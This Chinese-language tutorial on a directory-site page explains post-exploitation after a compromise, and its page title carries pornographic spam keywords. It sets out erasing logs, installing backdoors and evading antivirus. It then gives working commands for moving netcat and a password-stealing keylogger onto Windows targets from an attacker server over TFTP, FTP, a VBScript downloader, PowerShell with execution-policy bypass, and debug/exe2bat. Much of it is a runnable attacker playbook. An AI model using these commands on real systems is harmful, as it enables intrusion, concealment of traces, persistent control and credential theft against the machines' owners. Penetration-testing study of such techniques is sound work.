日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網(wǎng)為廣大站長提供免費收錄網(wǎng)站服務(wù),提交前請做好本站友鏈:【 網(wǎng)站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(wù)(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網(wǎng)站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

先來解釋一下什么是后漏洞利用階段。就是經(jīng)過一系列簡單或者復(fù)雜的操作后,你已經(jīng)獲取了目標(biāo)機(jī)器當(dāng)前的管理員權(quán)限,但是你這個管理員權(quán)限不一定一直會有效,說不定目標(biāo)機(jī)器的主人明天就更新補丁,就把現(xiàn)有的一些緩沖區(qū)溢出的漏洞封死了。

所以我們要在還能擁有權(quán)限的這段時間,給自己開一個長久有效的后門。

后漏洞利用階段:操作步驟

一般在后漏洞利用階段,我們主要做這些操作:

  1. 上傳工具
  2. 提權(quán)
  3. 擦除攻擊痕跡
  4. 安裝后門:4.1 長期控制、4.2 dump密碼、4.3 內(nèi)網(wǎng)滲透

上傳工具很容易理解,目標(biāo)機(jī)器畢竟不是我們自己的,有我們所有需要的工具,目標(biāo)機(jī)器現(xiàn)有的工具也不一定能滿足你的需要,所以要根據(jù)實際情況,往目標(biāo)機(jī)器里傳入一些用于實現(xiàn)后續(xù)目的的工具。

提權(quán)是因為你進(jìn)入目標(biāo)機(jī)器,不一定是以管理員的身份進(jìn)入,也許只是以普通用戶的身份進(jìn)入,這時候就需要想其他辦法提升當(dāng)前賬號的權(quán)限,或者給自己弄一個管理員賬號。不然后續(xù)的很多操作可能都會受到限制。

擦除攻擊痕跡是比較重要的一個步驟,不管是操作系統(tǒng)的日志,還是應(yīng)用程序的日志,都需要清理干凈。我們前期的掃描、攻擊動作,都會在目標(biāo)系統(tǒng)留下相應(yīng)的記錄,就拿前面對SLmail的攻擊作為例子,在目標(biāo)機(jī)器的日志中會有對應(yīng)的記錄:

關(guān)于后漏洞利用階段的介紹

攻擊機(jī)在目標(biāo)機(jī)器留下的記錄

最后安裝后門,就是我們的最終目的。

后漏洞利用階段:難點

后漏洞利用階段最大的挑戰(zhàn)是防病毒軟件。防病毒軟件都有很豐富的特征庫,只要匹配上特征庫,就會被當(dāng)成病毒或者漏洞進(jìn)行處理。而前面的操作,很多都會被防病毒軟件識別出來并修改。

為了防止被防病毒軟件的特征庫匹配上,我們在選用傳給目標(biāo)機(jī)器的軟件時,盡量選用合法的遠(yuǎn)程控制軟件。比如目標(biāo)機(jī)器是linux系統(tǒng)的話,curl和wget一般是所有Linux系統(tǒng)都會預(yù)裝的工具,通過這兩個工具很容易就能完成其他工具或者木馬的下載安裝,或者安裝一個netcat,也就能完成很多騷操作。而windows系統(tǒng)的dos界面的預(yù)裝下載工具,其實是比較少接觸和使用的,很多人都習(xí)慣了Windows圖形化界面的工具。

后漏洞利用階段:Windows的目標(biāo)機(jī)器

像前面利用SLmail緩沖區(qū)溢出獲取的遠(yuǎn)程控制,也就是shell,是一種非交互模式shell,類似nc的遠(yuǎn)程控制shell,

非交互模式shell和交互模式shell比較明顯的不同有以下幾點:

  1. 不能通過tab鍵進(jìn)行命令補全,非交互模式shell必須手敲完整命令;
  2. 在非交互模式shell里面執(zhí)行一個子命令,比如輸入Python,無法進(jìn)入對應(yīng)的控制臺。
關(guān)于后漏洞利用階段的介紹

非交互模式shell無法進(jìn)入子命令

所以我們要盡量實現(xiàn)交互模式的遠(yuǎn)程控制。只是獲得了非交互式模式的遠(yuǎn)程控制,對于我們后續(xù)的操作還是有一些限制的。所以接下來我們主要介紹一些將工具傳給目標(biāo)主機(jī)的方法。

往Windows傳文件:TFTP

TFTP(Trivial File Transfer Protocol,簡單文件傳輸協(xié)議)是一個傳輸文件的簡單協(xié)議,絕大多數(shù)情況下基于UDP協(xié)議而實現(xiàn),也不排除有部分TFTP協(xié)議是基于其它傳輸協(xié)議完成的。用來在客戶機(jī)與服務(wù)器之間進(jìn)行簡單文件傳輸,提供不復(fù)雜、開銷不大的文件傳輸服務(wù)。端口號為69。

TFTP沒有身份校驗的功能,所以沒有成為主流的傳輸工具?,F(xiàn)在主流的windows10是需要單獨添加TFTP服務(wù)的,不能直接使用。以前的windowsXp是默認(rèn)預(yù)裝的,不過現(xiàn)在應(yīng)該很少有人用xp了。而且現(xiàn)在的邊界防火墻一般都會將tftp的數(shù)據(jù)包過濾掉,所以TFTP使用場景其實還是有些局限性的。

如何在windows10安裝TFTP就不在這里展開了,網(wǎng)上有比較詳細(xì)的教程帖子。這里主要演示將kali作為服務(wù)器,在windows環(huán)境下載服務(wù)器上的文件。

先要在作為服務(wù)器的機(jī)器上創(chuàng)建一個根目錄,這個目錄用于存放各種遠(yuǎn)程控制軟件:

關(guān)于后漏洞利用階段的介紹

mkdir /tftp

修改tftp文件夾的擁有者,讓誰都可以訪問:

關(guān)于后漏洞利用階段的介紹

chown -R nobody /tftp/

找一些kali里默認(rèn)存放著的一些控制工具到tftp文件夾:

關(guān)于后漏洞利用階段的介紹

cp /usr/share/windows-binaries/nc.exe /tftp


/usr/share/windows-binaries/目錄下,存放了一些為windows機(jī)器準(zhǔn)備的一些安裝程序。

啟動tftp的服務(wù):

關(guān)于后漏洞利用階段的介紹

atftpd --daemon --port 69 /tftp

參數(shù)--daemon表示在后臺運行,后面的--port就是指定端口。

可以通過檢查端口來判斷tftp的服務(wù)是否啟動:

關(guān)于后漏洞利用階段的介紹

netstat -pantu | grep 69

需要注意的一點是,如果你的檢查結(jié)果顯示(最右邊那項)進(jìn)程不是atftpd,可能是你的權(quán)限還有問題,沒有將tftp文件夾和里面的所有文件的擁有者改成nobody。

當(dāng)然就算檢查結(jié)果顯示進(jìn)程是atftpd,如果tftp文件夾里的文件不是nobody,后面其他機(jī)器想要下載也會有問題。所以只要有文件放入tftp文件夾,就執(zhí)行一下上面修改文件擁有者的命令:

關(guān)于后漏洞利用階段的介紹

修改文件的權(quán)限

然后就可以在Windows機(jī)器去下載kali里的文件了:

關(guān)于后漏洞利用階段的介紹

tftp -i 192.168.0.102 get nc.exe

這里介紹兩個kali里為Windows機(jī)器準(zhǔn)備的三個程序。第一個是nc.exe,它的功能和netcat類似;第二個是whoami.exe,可以檢查當(dāng)前使用賬戶的權(quán)限;第三個是klogger.exe,一旦運行,就會記錄所有鍵盤的敲擊,對于盜取賬戶密碼應(yīng)該是很挺有用的。

往Windows傳文件:FTP

kali默認(rèn)是沒有預(yù)裝ftp工具的,所以需要自己選擇一個ftp工具進(jìn)行安裝。ftp的工具有很多,比如vsftpd、pure-ftpd等等,這里使用的是vsftpd。

安裝比較簡單,直接一個命令就可以:

關(guān)于后漏洞利用階段的介紹

apt-get install vsftpd

如果下載不成功的話,可以到/etc/apt/sources.list文件里修改一下源地址。

vsftpd常用的命令如下:

# 啟動服務(wù)
service vsftpd start
# 查看服務(wù)
service vsftpd status
# 停止服務(wù)
service vsftpd stop
# 重新啟動服務(wù)
service vsftpd restart

可以先啟動一下,看看能不能順利啟動:

關(guān)于后漏洞利用階段的介紹

檢查vsftpd安裝是否正確

接下來先要創(chuàng)建一個用于上傳下載的目錄,要給創(chuàng)建的這個目錄修改一下權(quán)限,因為實際使用中會創(chuàng)建、修改文件,我這邊圖簡便就直接777了:

關(guān)于后漏洞利用階段的介紹

創(chuàng)建上傳/下載的目錄

然后需要新建用戶并設(shè)置密碼:

關(guān)于后漏洞利用階段的介紹

新建用戶

如果不明白useradd各個參數(shù)的使用,可以通過-h看一下使用說明。這里-d表示設(shè)置新用戶的home目錄,-s表示新用戶的登錄方式。

修改配置文件vsftpd.conf:

關(guān)于后漏洞利用階段的介紹

控制用戶登錄

還有將vsftpd.conf文件里的這個注釋取消:

關(guān)于后漏洞利用階段的介紹

取消注釋

取消這個注釋是為了能夠?qū)懭胛募?/p>

前面配置的時候是用/root/allowed_users文件來控制登錄,那就要到對應(yīng)位置創(chuàng)建文件:

關(guān)于后漏洞利用階段的介紹

設(shè)置登錄用戶

在配置了登錄用戶后,你可能會發(fā)現(xiàn)這些用戶還是無法登錄,那你就可以到黑名單文件看一下,你的用戶是否在黑名單上面:

關(guān)于后漏洞利用階段的介紹

cat /etc/ftpusers

完成上述配置后重啟一下vsftpd的服務(wù),讓配置生效:

關(guān)于后漏洞利用階段的介紹

重啟vsftpd服務(wù)

這個時候已經(jīng)可以正常使用ftp了,先在本地試一下:

關(guān)于后漏洞利用階段的介紹

本地使用ftp

換到windows環(huán)境下訪問ftp:

關(guān)于后漏洞利用階段的介紹

ftp://ftpuser:[email protected]

別用瀏覽器直接輸入命令,大概率會出現(xiàn)問題,到“我的電腦”地址欄輸入命令,或者也可以使用ftp工具(Windows自帶ftp工具)。

這里可能有些同學(xué)會想到我們最開始獲取的都是非交互模式shell,無法正常完成賬戶名、密碼的驗證,也沒有圖形化界面可以使用。

其實可以換個思路,將所有目標(biāo)機(jī)器上要執(zhí)行的ftp命令,都寫到目標(biāo)機(jī)器的文本文件里,最后使用Windows上的ftp命令調(diào)用前面寫的文本文件:

關(guān)于后漏洞利用階段的介紹

在目標(biāo)機(jī)器制作ftp.txt文件

讓ftp讀取文本中的相關(guān)指令:

關(guān)于后漏洞利用階段的介紹

執(zhí)行ftp.txt

可以查看一下是否獲取到文件:

關(guān)于后漏洞利用階段的介紹

查看獲取到的文件

往Windows傳文件:vbscript

vbscript能實現(xiàn)的功能很多,這里就演示一個讓目標(biāo)主機(jī)通過http訪問我預(yù)先準(zhǔn)備好的地址,將事先準(zhǔn)備好的軟件下載到目標(biāo)主機(jī)。

因為要通過http訪問,所以要啟動一個服務(wù),這里使用kali中自帶的Apache服務(wù):

關(guān)于后漏洞利用階段的介紹

service apache2 start

apache服務(wù)的默認(rèn)目錄在:/var/www/html,將要傳給目標(biāo)主機(jī)的軟件移動或者復(fù)制到這個目錄:

關(guān)于后漏洞利用階段的介紹

將軟件存入預(yù)定位置

生成vbscript的腳本的命令如下:

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strUrl, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray, lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

最后生成的vbscript腳本是這樣的:

關(guān)于后漏洞利用階段的介紹

vbscript腳本

執(zhí)行的時候需要使用cscript工具:

關(guān)于后漏洞利用階段的介紹

cscript wget.vbs http://192.168.0.102/whoami.exe whoami.exe

查看軟件是否被下載:

關(guān)于后漏洞利用階段的介紹

檢查下載的軟件

往Windows傳文件:powershell

vbscript相對以前,其實不是很被推崇了,現(xiàn)在比較新的Windows系統(tǒng),都是推薦使用powershell,所以這里也介紹一種powershell傳輸軟件的方式。

腳本比較簡單:

$storngeDir = $pwd
$webclient = New-Object System.Net.WebClient
$url = 'http://192.168.0.102/whoami.exe'
$file = 'D:w.exe'
$webclient.DownloadFile($url, $file)

在已經(jīng)開啟http服務(wù)的情況下,在Windows環(huán)境通過命令執(zhí)行上面這個腳本:

關(guān)于后漏洞利用階段的介紹

powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

如果執(zhí)行的時候遇到“遠(yuǎn)程服務(wù)器返回錯誤: (403) 已禁止。”,那應(yīng)該是源文件的權(quán)限有問題,用chmod命令去修改一下權(quán)限就可以了。

執(zhí)行命令中的一些參數(shù)-ExecutionPolicy主要是為了允許本地執(zhí)行powershell腳本,感興趣的可以通過-Help看一下幫助說明。

上面的腳本其實可以省略,直接在dos界面執(zhí)行一個長命令:

powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.0.102/whoami.exe', 'D:w.exe')

也能達(dá)到同樣的效果:

關(guān)于后漏洞利用階段的介紹

下載軟件

如果本地的執(zhí)行策略比較嚴(yán)格,還是需要加上前面的那些參數(shù)。

還有powershell能使用的模塊很多,不一定要用System.Net.WebClient,還有Invoke-WebRequest、Invoke-RestMethod、Start-BitTransfer都能達(dá)到同樣的效果。具體使用哪一個模塊,主要看你控制的機(jī)器具體版本,一般都是有什么用什么。

往Windows傳文件:debug

Debug工具是windows用來做匯編等的一個工具。在新一點的Windows10已經(jīng)沒有了,早一些的WindowsXp還是有的。如果你的目標(biāo)機(jī)器是Windows10的系統(tǒng),且現(xiàn)有條件讓你必須使用debug,那你必須給目標(biāo)機(jī)器安裝一個debug工具,這就變成先有雞還是先有蛋的問題了。不是很推薦debug這種方式傳輸軟件。

先將要傳遞的軟件進(jìn)行壓縮:

關(guān)于后漏洞利用階段的介紹

upx -9 whoami.exe

壓縮不是必須的,只是當(dāng)文件太大的時候,debug就無法轉(zhuǎn)換成功,debug最大只能是64Kb。

用工具exe2bat.exe轉(zhuǎn)換一下:

關(guān)于后漏洞利用階段的介紹

wine /usr/share/windows-binaries/exe2bat.exe whoami.exe whoami.txt

由于這個工具是Windows環(huán)境的,所以要通過wine工具來運行??梢钥吹捷敵龅奈臋n:

關(guān)于后漏洞利用階段的介紹

cat whoami.txt

在已經(jīng)獲取的非交互模式shell中,直接執(zhí)行輸出txt文檔里面的內(nèi)容,除最后兩行外。

執(zhí)行完之后,在被控制的目標(biāo)機(jī)器上就會有一個123.hex文件:

關(guān)于后漏洞利用階段的介紹

目標(biāo)機(jī)器生成123.hex

然后執(zhí)行倒數(shù)第二行命令debug<123.hex,Windows就會進(jìn)行一個匯編的工程,最終輸出一個1.DLL文件,這個文件其實就是原來的exe文件。最后就是執(zhí)行最后一行命令copy 1.dll whoami.exe,將文件還原成exe的可執(zhí)行文件。

分享到:
標(biāo)簽:漏洞
用戶無頭像

網(wǎng)友整理

注冊時間:

網(wǎng)站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網(wǎng)站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨大挑戰(zhàn)2018-06-03

數(shù)獨一種數(shù)學(xué)游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學(xué)四六

運動步數(shù)有氧達(dá)人2018-06-03

記錄運動步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓(xùn)練成績評定2018-06-03

通用課目體育訓(xùn)練成績評定